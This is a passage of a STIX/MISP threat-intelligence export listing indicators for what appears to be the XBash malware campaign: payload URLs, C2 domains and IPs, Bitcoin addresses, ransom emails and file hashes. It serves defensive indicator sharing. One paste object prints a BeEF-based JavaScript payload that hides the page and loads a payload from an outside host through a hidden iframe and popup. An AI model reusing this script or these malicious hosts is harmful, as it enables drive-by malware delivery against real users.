"2018-09-19T04:47:13.000Z", "modified": "2018-09-19T04:47:13.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://3g2upl4pq6kufc4m.tk/r88.sh']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:13Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4d2-1cd0-4dbb-bb96-444e950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:14.000Z", "modified": "2018-09-19T04:47:14.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://e3sas6tzvehwgpak.tk/XbashX']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:14Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4d2-98dc-4ef9-a073-4449950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:14.000Z", "modified": "2018-09-19T04:47:14.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://png.realtimenews.tk/m.png']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:14Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4d2-39ec-4b98-ae74-42bb950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:14.000Z", "modified": "2018-09-19T04:47:14.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://daknobcq4zal6vbm.tk/tt.txt']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:14Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4d3-4da0-43c6-a073-4820950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:15.000Z", "modified": "2018-09-19T04:47:15.000Z", "description": "Downloading URLs", "pattern": "[url:value = 'http://d3goboxon32grk2l.tk/reg9.sct']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:15Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4f3-0ef4-44cb-8e2e-4fc6950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:47.000Z", "modified": "2018-09-19T04:47:47.000Z", "description": "Domains for C2 Communication", "pattern": "[domain-name:value = 'ejectrift.censys.xyz']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:47Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4f3-ba24-4602-99bb-43fc950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:47.000Z", "modified": "2018-09-19T04:47:47.000Z", "description": "Domains for C2 Communication", "pattern": "[domain-name:value = 'scan.censys.xyz']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:47Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4f4-fa84-48bf-a1b9-49b8950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:48.000Z", "modified": "2018-09-19T04:47:48.000Z", "description": "Domains for C2 Communication", "pattern": "[domain-name:value = 'api.leakingprivacy.tk']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:48Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4f4-9b88-4f01-a225-42c6950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:48.000Z", "modified": "2018-09-19T04:47:48.000Z", "description": "Domains for C2 Communication", "pattern": "[domain-name:value = 'news.realnewstime.xyz']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:48Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4f4-47dc-4ee5-a3eb-43e5950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:48.000Z", "modified": "2018-09-19T04:47:48.000Z", "description": "Domains for C2 Communication", "pattern": "[domain-name:value = 'scan.realnewstime.xyz']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:48Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4f5-3b08-406a-8ad7-42cb950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:49.000Z", "modified": "2018-09-19T04:47:49.000Z", "description": "Domains for C2 Communication", "pattern": "[domain-name:value = 'news.realtimenews.tk']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:49Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4f5-50fc-4482-9ed4-4360950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:49.000Z", "modified": "2018-09-19T04:47:49.000Z", "description": "Domains for C2 Communication", "pattern": "[domain-name:value = 'scanaan.tk']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:49Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4f6-5598-4a65-8dd5-44ff950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:50.000Z", "modified": "2018-09-19T04:47:50.000Z", "description": "Domains for C2 Communication", "pattern": "[domain-name:value = 'scan.3g2upl4pq6kufc4m.tk']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:50Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4f6-4230-4c9b-80fe-4167950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:50.000Z", "modified": "2018-09-19T04:47:50.000Z", "description": "Domains for C2 Communication", "pattern": "[domain-name:value = 'scan.vfk2k5s5tfjr27tz.tk']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:50Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4f7-a7c8-4c70-9fa5-47a1950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:51.000Z", "modified": "2018-09-19T04:47:51.000Z", "description": "Domains for C2 Communication", "pattern": "[domain-name:value = 'scan.blockbitcoin.tk']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:51Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"hostname\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d4f7-66f4-4d3f-ae76-40a8950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:47:51.000Z", "modified": "2018-09-19T04:47:51.000Z", "description": "Domains for C2 Communication", "pattern": "[domain-name:value = 'blockbitcoin.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:47:51Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"domain\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d508-02d8-44e3-a778-27c3950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:48:08.000Z", "modified": "2018-09-19T04:48:08.000Z", "description": "IPs for C2 Communication", "pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '142.44.215.177']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:48:08Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"ip-dst\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d509-5e58-4d73-bd76-27c3950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:48:09.000Z", "modified": "2018-09-19T04:48:09.000Z", "description": "IPs for C2 Communication", "pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '144.217.61.147']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:48:09Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"ip-dst\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d51f-5344-4ba2-ae31-4bea950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:48:31.000Z", "modified": "2018-09-19T04:48:31.000Z", "description": "URLs for C2 Domain Updating", "pattern": "[url:value = 'https://pastebin.com/raw/Xu74Mzif']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:48:31Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d51f-d130-4d8f-a046-4e27950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:48:31.000Z", "modified": "2018-09-19T04:48:31.000Z", "description": "URLs for C2 Domain Updating", "pattern": "[url:value = 'https://pastebin.com/raw/rBHjTZY6']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:48:31Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Network activity" } ], "labels": [ "misp:type=\"url\"", "misp:category=\"Network activity\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-attribute", "spec_version": "2.1", "id": "x-misp-attribute--5ba1d53e-c4bc-4bf0-8245-4a22950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:49:02.000Z", "modified": "2018-09-19T04:49:02.000Z", "labels": [ "misp:type=\"btc\"", "misp:category=\"Financial fraud\"", "misp:to_ids=\"True\"" ], "x_misp_category": "Financial fraud", "x_misp_type": "btc", "x_misp_value": "1Kss6v4eSUgP4WrYtfYGZGDoRsf74M7CMr" }, { "type": "x-misp-attribute", "spec_version": "2.1", "id": "x-misp-attribute--5ba1d53e-b274-4731-abbb-4920950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:49:02.000Z", "modified": "2018-09-19T04:49:02.000Z", "labels": [ "misp:type=\"btc\"", "misp:category=\"Financial fraud\"", "misp:to_ids=\"True\"" ], "x_misp_category": "Financial fraud", "x_misp_type": "btc", "x_misp_value": "1ExbdpvKJ6M1t5KyiZbnzsdQ63SEsY6Bff" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d55f-2fcc-49ac-b905-4e51950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:49:35.000Z", "modified": "2018-09-19T04:49:35.000Z", "description": "Email Addresses in Ransom Messages", "pattern": "[email-message:to_refs[*].value = 'backupsql@protonmail.com']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:49:35Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"email-dst\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d560-0e08-460b-9909-480b950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:49:36.000Z", "modified": "2018-09-19T04:49:36.000Z", "description": "Email Addresses in Ransom Messages", "pattern": "[email-message:to_refs[*].value = 'backupsql@pm.me']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:49:36Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"email-dst\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--5ba1d560-2538-43e3-8bb2-4d1f950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:49:36.000Z", "modified": "2018-09-19T04:49:36.000Z", "description": "Email Addresses in Ransom Messages", "pattern": "[email-message:to_refs[*].value = 'backupdatabase@pm.me']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T04:49:36Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "Payload delivery" } ], "labels": [ "misp:type=\"email-dst\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--5ba1d5ac-1460-4ba2-9ff1-458e950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:50:52.000Z", "modified": "2018-09-19T04:50:52.000Z", "labels": [ "misp:name=\"paste\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "text", "object_relation": "paste", "value": "scan.vfk2k5s5tfjr27tz.tk\r\nscan.blockbitcoin.tkh", "category": "Other", "uuid": "5ba1d5ac-4b4c-486a-88ee-4b38950d210f" }, { "type": "text", "object_relation": "username", "value": "wfkfly", "category": "Other", "uuid": "5ba1d5ac-4dd0-4d93-b667-4d80950d210f" }, { "type": "text", "object_relation": "origin", "value": "pastebin.com", "category": "Other", "uuid": "5ba1d5ad-9e90-4225-99a2-4679950d210f" }, { "type": "url", "object_relation": "url", "value": "https://pastebin.com/raw/Xu74Mzif", "category": "Network activity", "to_ids": true, "uuid": "5ba1d5ad-17d8-4d8b-8b63-4f23950d210f" } ], "x_misp_meta_category": "misc", "x_misp_name": "paste" }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--5ba1d60a-9f28-434d-b03a-4b86950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:52:26.000Z", "modified": "2018-09-19T04:52:26.000Z", "labels": [ "misp:name=\"paste\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "text", "object_relation": "paste", "value": "142.44.215.177\r\n144.217.61.147", "category": "Other", "uuid": "5ba1d60a-82f8-486e-99d5-4580950d210f" }, { "type": "text", "object_relation": "username", "value": "wfkfly", "category": "Other", "uuid": "5ba1d60b-7de0-4efe-bb0b-44ca950d210f" }, { "type": "text", "object_relation": "origin", "value": "pastebin.com", "category": "Other", "uuid": "5ba1d60b-8bb8-4e7a-a466-40fc950d210f" }, { "type": "url", "object_relation": "url", "value": "https://pastebin.com/raw/rBHjTZY6", "category": "Network activity", "to_ids": true, "uuid": "5ba1d60b-8930-46d0-a00b-4dc6950d210f" } ], "x_misp_meta_category": "misc", "x_misp_name": "paste" }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--5ba1d673-e378-45e9-9d50-41c6950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:54:11.000Z", "modified": "2018-09-19T04:54:11.000Z", "labels": [ "misp:name=\"paste\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "text", "object_relation": "paste", "value": "//\r\n// Copyright (c) 2006-2018 Wade Alcorn - wade@bindshell.net\r\n// Browser Exploitation Framework (BeEF) - http://beefproject.com\r\n// See the file 'doc/COPYING' for copying permission\r\n//\r\n\r\n // Module Configurations\r\nvar image = \"http://d20blzxlz9ydha.cloudfront.net/flash.png\";\r\nvar payload_type = \"Custom_Payload\";\r\nvar payload_uri = \"http://update.pythonanywhere.com/d\";\r\n\r\n//var beef_root = beef.net.httpproto + \"://\" + beef.net.host + \":\" + beef.net.port;\r\nvar payload = \"\";\r\n\r\n// Function to gray out the screen\r\nvar grayOut = function(vis, options) {\r\nvar options = options || {};\r\nvar zindex = options.zindex || 50;\r\nvar opacity = options.opacity || 70;\r\nvar opaque = (opacity / 100);\r\nvar bgcolor = options.bgcolor || '#000000';\r\nvar dark=document.getElementById('darkenScreenObject');\r\nif (!dark) {\r\n var tbody = document.getElementsByTagName(\"body\")[0];\r\n var tnode = document.createElement('div');\r\n tnode.style.position='absolute';\r\n tnode.style.top='0px';\r\n tnode.style.left='0px';\r\n tnode.style.overflow='hidden';\r\n tnode.style.display='none';\r\n tnode.id='darkenScreenObject';\r\n tbody.appendChild(tnode);\r\n dark=document.getElementById('darkenScreenObject');\r\n}\r\nif (vis) {\r\n var pageWidth='100%';\r\n var pageHeight='100%';\r\n dark.style.opacity=opaque;\r\n dark.style.MozOpacity=opaque;\r\n dark.style.filter='alpha(opacity='+opacity+')';\r\n dark.style.zIndex=zindex;\r\n dark.style.backgroundColor=bgcolor;\r\n dark.style.width= pageWidth;\r\n dark.style.height= pageHeight;\r\n dark.style.display='block';\r\n} else {\r\n dark.style.display='none';\r\n}\r\n};\r\n\r\n\r\n// Payload Configuration\r\nswitch (payload_type) {\r\n\tcase \"Custom_Payload\":\r\n\t payload = payload_uri;\r\n\tbreak;\r\n\tcase \"Firefox_Extension\":\r\n\t //payload = beef_root + \"/api/ipec/ff_extension\";\r\n\t break;\r\n\tdefault:\r\n\t //beef.net.send('<%= @command_url %>', <%= @command_id %>, 'error=payload not selected');\r\n\t break;\r\n}\r\n\r\n// Create DIV\r\nvar flashdiv = document.createElement('div');\r\nflashdiv.setAttribute('id', 'flashDiv');\r\nflashdiv.setAttribute('style', 'position:absolute; top:20%; left:30%; z-index:51;');\r\nflashdiv.setAttribute('align', 'center');\r\nvar id = setInterval(frame, 100);\r\nfunction frame() {\r\n\tif (document.body.appendChild(flashdiv)) {\r\n\t\t// window.open is very useful when using data URI vectors and the IFrame/Object tag\r\n\t\t// also, as the user is clicking on the link, the new tab opener is not blocked by the browser.\r\n\t\tflashdiv.innerHTML = \"\";\r\n\r\n\t\t// gray out the background\r\n\t\tgrayOut(true,{'opacity':'30'});\r\n\r\n\t\t// clean up on click\r\n\t\tdocument.getElementById(\"flashDiv\").onclick = function(){\r\n\t\t\tdocument.body.removeChild(flashdiv);\r\n\t\t\tgrayOut(false,{'opacity':'0'});\r\n\t\t\tdocument.body.removeChild(document.getElementById('darkenScreenObject'));\r\n\t\t\taa=window.open(\"http://dzebppteh32lz.cloudfront.net/c\",'popUpWindow','height=1,width=1,top=0,left=0,resizable=no,scrollbars=no,toolbar=no,menubar=no,location=no,directories=no,status=no')\r\n\t\t\t//aa=window.openwindow.open(\"http://d3lvemwrafj7a7.cloudfront.net/e\",'_blank', 'toolbar=no,status=no,menubar=no,scrollbars=no,resizable=no,left=10000, top=10000, width=10, height=10', ''); \r\n\t\t\taa.moveTo(10000,10000);\r\n\t\t\t//window.open(\"http://update.pythonanywhere.com/d\");\r\n\t\t\tvar iframe = document.createElement('iframe');\r\n\t\t\tiframe.style.display = \"none\";\r\n\t\t\tiframe.src = \"http://update.pythonanywhere.com/d\";\r\n\t\t\tdocument.body.appendChild(iframe);\r\n\t\t\t\r\n\t\t}\r\n\t clearInterval(id);\r\n\t} \r\n}", "category": "Other", "uuid": "5ba1d673-8450-46fa-bc4e-4243950d210f" }, { "type": "text", "object_relation": "username", "value": "wfkfly", "category": "Other", "uuid": "5ba1d674-5500-4354-b426-4bad950d210f" }, { "type": "text", "object_relation": "origin", "value": "pastebin.com", "category": "Other", "uuid": "5ba1d674-e264-47fd-a089-449e950d210f" }, { "type": "url", "object_relation": "url", "value": "https://pastebin.com/raw/AbhwC1Ki", "category": "Network activity", "to_ids": true, "uuid": "5ba1d674-f124-48c8-95ff-4bb8950d210f" } ], "x_misp_meta_category": "misc", "x_misp_name": "paste" }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--5ba1d6ce-de54-4d15-8134-27c3950d210f", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T04:55:42.000Z", "modified": "2018-09-19T04:55:42.000Z", "labels": [ "misp:name=\"paste\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "text", "object_relation": "paste", "value": "https://daknobcq4zal6vbm.tk/m.exe;", "category": "Other", "uuid": "5ba1d6ce-d1e4-4362-a7ac-27c3950d210f" }, { "type": "text", "object_relation": "username", "value": "wfkfly", "category": "Other", "uuid": "5ba1d6cf-498c-4df8-b61f-27c3950d210f" }, { "type": "text", "object_relation": "origin", "value": "pastebin.com", "category": "Other", "uuid": "5ba1d6cf-7928-4e3e-9e52-27c3950d210f" }, { "type": "url", "object_relation": "url", "value": "https://pastebin.com/R5q9wvHw", "category": "Network activity", "to_ids": true, "uuid": "5ba1d6cf-6ac4-4e0e-a8e7-27c3950d210f" } ], "x_misp_meta_category": "misc", "x_misp_name": "paste" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--9fb96957-5ea7-449a-bbd2-ff71922b5a6e", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:02.000Z", "modified": "2018-09-19T05:21:02.000Z", "pattern": "[file:hashes.MD5 = '33357485c5c92f087bd53602d6d8a48b' AND file:hashes.SHA1 = '7403a54aa5ff712a8614e6a90398322d5fa7ba89' AND file:hashes.SHA256 = '5b790f02bdb26b6b6b270a5669311b4f231d17872aafb237b7e87b6bbb57426d']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:02Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--7c26518e-fa7a-453f-a4cd-e234d2520d3e", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:01.000Z", "modified": "2018-09-19T05:21:01.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-18T19:28:42", "category": "Other", "uuid": "cbf68cfc-a53a-4a67-b043-d514ef6c251a" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/5b790f02bdb26b6b6b270a5669311b4f231d17872aafb237b7e87b6bbb57426d/analysis/1537298922/", "category": "External analysis", "uuid": "d17c47a6-5c9e-4b65-97a1-ecd5dd083c82" }, { "type": "text", "object_relation": "detection-ratio", "value": "9/53", "category": "Other", "uuid": "6f915503-6a42-4a44-8ba4-a563bb038e7d" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--d33ee6ee-437e-4ce5-ab11-837fee0edc8c", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:05.000Z", "modified": "2018-09-19T05:21:05.000Z", "pattern": "[file:hashes.MD5 = '1de7ceb3434243aa94296393165f89e7' AND file:hashes.SHA1 = '67a12afbe6751418141284716235a6b27c17443a' AND file:hashes.SHA256 = '725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:05Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--6836f38c-a2eb-4f7c-9055-2ffb96e7c45e", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:03.000Z", "modified": "2018-09-19T05:21:03.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-19T03:31:22", "category": "Other", "uuid": "a7862599-832b-4ba2-ab1c-b1a320c1a4ad" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/725efd0f5310763bc5375e7b72dbb2e883ad90ec32d6177c578a1c04c1b62054/analysis/1537327882/", "category": "External analysis", "uuid": "abcf84f8-0717-443f-b190-4c623df3933d" }, { "type": "text", "object_relation": "detection-ratio", "value": "26/58", "category": "Other", "uuid": "c306e374-13a0-4f9e-956c-e55fe50a8c97" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--edd4b990-82be-4e5e-858f-50bbd7222f03", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:07.000Z", "modified": "2018-09-19T05:21:07.000Z", "pattern": "[file:hashes.MD5 = 'f8c7e23c71478aa99dc3627da989b2ca' AND file:hashes.SHA1 = 'e41d26b124c21b2c82b77194ed6be6ee8281410a' AND file:hashes.SHA256 = 'dbc380cbfb1536dfb24ef460ce18bccdae549b4585ba713b5228c23924385e54']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:07Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--54646fe4-9b9d-470a-9042-d446a90a15a5", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:05.000Z", "modified": "2018-09-19T05:21:05.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-18T20:07:10", "category": "Other", "uuid": "f8ac3222-2b8a-49c6-b107-f22538e9f3f9" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/dbc380cbfb1536dfb24ef460ce18bccdae549b4585ba713b5228c23924385e54/analysis/1537301230/", "category": "External analysis", "uuid": "193bbd5f-b6bd-43bc-b1f7-f75586c795ad" }, { "type": "text", "object_relation": "detection-ratio", "value": "10/58", "category": "Other", "uuid": "2240f3fb-744f-48a4-8918-f9c428c4d465" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--33e723b8-2142-46a4-8eae-c311211ea8a0", 